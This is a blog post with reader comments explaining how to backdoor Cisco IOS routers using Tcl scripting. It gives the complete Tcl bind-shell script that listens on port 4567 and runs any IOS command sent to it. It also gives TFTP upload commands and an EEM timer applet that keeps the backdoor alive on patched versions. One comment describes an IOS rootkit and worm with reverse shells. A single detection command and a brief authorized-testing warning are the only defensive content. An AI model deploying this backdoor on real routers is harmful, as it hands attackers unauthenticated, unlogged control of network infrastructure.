Attacking Cisco Router over TCL

Today only lazy or out from the IT sphere person never heard about Cisco. Company specialized in developing network devices and solving all related problems. IOS (Internetwork Operation System) is installed on Cisco networking equipment and allows flexible system configuration. There is different method for attacking Cisco devices but what we will be looking at is attacking Cisco devices using TCL.


Tcl (Tool Command Language)
is a scripting language used on embedded systems platforms, both in its full form and in several other small-footprinted versions. From Cisco IOS version 12.3 (7/28/2003), TCL has been included in Cisco IOS as a generic scripting language.

When you first log to Cisco router you are in user EXEC mode (level 1) from this mode you can have just some information such as interfaces status, view routes in the routing table. Now for TCL we need privilege level 15 (full admin) rights to execute a script, this level is equivalent to having root privileges in UNIX or administrator privileges in Windows.

For uploading the TCL script to cisco device we can use different protocols such as TFTP, RCP or SCP. For TFTP you do the following:

Router>en
Router# copy tftp://tftpserver/script.tcl flash://script.tcl
Router# tclsh flash://script.tcl

Now the tcl script has been published by Andy Davis from the Information Risk Management and after some modefication it will looks as follows:

[php]proc callback {sock addr port} {
fconfigure $sock -translation lf -buffering line
puts $sock " Enter your desired IOS command:"
puts $sock " "
puts -nonewline $sock “Router# ”
puts $sock $response
fileevent $sock readable [list echo $sock]
}
proc echo {sock} {
global var
if {[eof $sock] || [catch {gets $sock line}]} {
} else {
set response [exec "$line"]
puts $sock $response
}
}
set port 4567
set sh [socket -server callback $port]
vwait var
close $sh_[/php]

Here we will have a backdoor on the router, so if an attacker will run telnet on port 4567 he will have the following:

$ telnet router 4567
Trying router…
Connected to router.
Escape character is ‘^]’.

Enter your desired IOS command:

Router#

This vulnerability has been fixed in recent IOS versions, but you can still use the same technique if you convert the Tclsh script into an EEM policy and trigger it periodically with a timer event as follows:

Router>en
Router # Conf t
Router (config) # event manager applet Tclsh
Router (config-applet) # event timer countdown name Delay time 20
Router (config-applet) # action 1 cli command “enable”
Router (config-applet) # action 2 cli Tclsh tftp://tftpserver/script.tcl

By executing the backdoor a penetration tester can access to the targeted host, bypassing all security measures such as authentication or access logging. For detecting that your router is compromised you need to run:

Router # show tcp brief all

Which is equivalent to Netstat on windows or linux system and it will list all connection established or waiting to be established on the router. So for the security of your business make sure to have the latest IOS version, to update all your systems and to use best practices for implementing or configuring any device.

Warning: The technique demonstrated is intended just for the use during an authorized penetration testing mission.

Refrences:

Cisco IOS Scripting with Tcl

http://www.cisco.com/en/US/docs/ios/12_3t/12_3t2/feature/guide/gt_tcl.html

SANS Institute IOScat – a Port of Netcat’s TCP functions to Cisco IOS http://www21.sans.org/reading_room/whitepapers/tools/iosmap-tcp-udp-port-scanning-cisco-ios-platforms_32964

make sure you subscribe to my RSS feed!

Share
You can leave a response, or trackback from your own site.
  • Pingback: Tweets that mention Attacking Cisco Router over TCL | SecTechno -- Topsy.com

  • Pingback: Week 44 in Review – 2010 | Infosec Events

  • Pingback: Seeb

  • Pingback: SecureArabia

  • Pingback: The Ho

  • Pingback: Caiado

  • Pingback: Sam Hunt

  • Pingback: Frederic GOUTH

  • Jbossvi

    yeah I demo’ed this at blackhat 2010
    http://blackhat.com/html/bh-us-10/bh-us-10-specialevents_arsenal.html#nehrboss

    it was a IOS rootkit and a self propagating IOS worm. the rootkit had forward/reverse shell, traffic pcap dumper, malware httpd server and other stuff. It was all done in tclsh

  • http://sectechno.com Mourad

    Thanks for the Comment Jason, can I have more details about the lab?

  • Jbossvi

    here is the pdf, lots of examples of the rootkit+accessories, The worm is not public though.

    http://www.surf.vi/docs/san_fran.pdf

  • http://sectechno.com Mourad

    Thanks for sharing Jason very interesting demonstartion.

  • Pingback: indi303

  • Pingback: Dave Marcus

  • Pingback: Mourad Ben Lakhoua

  • Pingback: Marc Rogers

  • E-devlet

    This is one of the best posts that I’ve ever seen; you may include some more ideas in the same theme. I’m still waiting for some interesting thoughts from your side in your next post.

  • fmarousek

    first version of this attack (using tclsh) was fixed in IOS 12.4(15)T. Second (using EEM policy) in IOS 12.4(20)T1

  • johnright

    Awesome.
    For Router Pictures

  • Pingback: » Cisco Router Backdoor — TCL Shell 葡萄树 On The Road

  • I_laji.co

    en
    here,I have a question:
    How To config TCL on cisco IOS if it not have been configed?IOS  Verion > 12.4(20)T